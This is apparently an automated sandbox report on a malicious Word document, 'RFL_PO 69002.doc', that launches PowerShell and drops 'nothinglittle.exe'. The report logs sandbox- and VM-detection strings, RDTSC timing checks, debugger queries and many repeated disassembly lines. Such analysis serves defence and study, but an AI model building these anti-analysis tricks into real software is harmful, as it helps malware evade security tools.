Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX

Source: RFL_PO 69002.doc

Stream path 'Data' entropy: 7.9926896989 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Code function: 28_2_00409A90 rdtsc

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\nothinglittle.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1329

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6168	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\nothinglittle.exe TID: 4604	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\nothinglittle.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Source: powershell.exe, 00000001.00000002.285192085.0000000005580000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: powershell.exe, 00000001.00000002.285192085.0000000005580000.00000004.00000001.sdmp	Binary or memory string: d:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001D.00000000.456979386.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000001D.00000000.452020297.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000001D.00000000.457446382.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: explorer.exe, 0000001D.00000000.452057636.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 0000001D.00000000.457920896.00000000088C3000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1SPS0
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Code function: 28_2_00409A90 rdtsc

Source: C:\Users\Public\Documents\nothinglittle.exe

Code function: 9_2_03021120 LdrInitializeThunk,

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01283138 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01290100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01290100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01290100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135F1B5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135F1B5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128519E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128519E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288190 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B4190 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134A189 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134A189 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AD1EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012831E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013141E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129C1C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B4020 mov edi, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01354015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01354015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01307016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01307016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01307016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01313019 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01351074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01342073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01287057 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013460F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013460F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013460F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013460F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012840E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012840E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012840E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B0C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B0C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
